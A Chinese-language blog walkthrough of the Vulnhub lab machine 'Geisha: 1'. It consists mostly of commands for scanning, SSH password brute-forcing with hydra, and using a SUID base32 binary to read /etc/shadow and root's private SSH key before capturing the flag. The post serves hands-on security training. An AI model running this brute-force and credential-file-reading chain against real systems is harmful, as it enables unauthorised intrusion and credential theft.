[網絡安全學習篇79]:Geisha: 1 Vulnhub 實戰

往期博文:

[網絡安全學習篇69]:滲透測試實戰-DC-1-靶機入侵

[網絡安全學習篇70]:滲透測試實戰-DC-2-靶機入侵

[網絡安全學習篇71]:滲透測試實戰-DC-3-靶機入侵

[網絡安全學習篇72]:滲透測試實戰-DC-4-靶機入侵

[網絡安全學習篇73]:滲透測試實戰-DC-5-靶機入侵

[網絡安全學習篇74]:滲透測試實戰-DC-6-靶機入侵

[網絡安全學習篇75]:滲透測試實戰-DC-7-靶機入侵

[網絡安全學習篇76]:滲透測試實戰-DC-8-靶機入侵

[網絡安全學習篇77]:滲透測試實戰-DC-9-靶機入侵

[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)

[網絡安全學習篇79]:Geisha: 1 Vulnhub 實戰(本篇)

下期博文:

 

目錄

信息收集

gobuster

攻擊

提權

拿到flag


信息收集

arp-scan -l

nmap -A 192.168.1.173 -p- -oN nmap.A

gobuster

gobuster dir -u http://192.168.1.173:7125/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

掃描得到/passwd

curl http://192.168.1.173:7125/passwd -o passwd && cat passwd | grep home

攻擊

hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.173 -o hydra.geisha && cat hydra.geisha

得到賬密:

[22][ssh] host: 192.168.1.173   login: geisha   password: letmein

ssh 登錄成功

ssh [email protected]

提權

查找具有suid權限的文件

find / -perm -4000 2>/dev/null

 

使用以下命令,用base32 讀取訪問受限制的文件 /etc/passwd ,讀取成功

base32 "/etc/shadow" | base32 --decode

 

嘗試使用ssh 登錄root,使用以下命令獲得在/root/.ssh 目錄下的root用戶登錄ssh 的私鑰

base32 "/root/.ssh/id_rsa" | base32 --decode

拿到flag

拿到其私鑰之後,我們可以直接在本地使用該私鑰登錄root | ssh

vim root.src.key

chmod 777 root.src.key

ssh [email protected] -i root.src.key

flag:

Flag{Sun_CTF_220_5_G31sha}


參考博文:

https://cyb3rbl0g.github.io/geisha-vulnhub-walkthrough/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章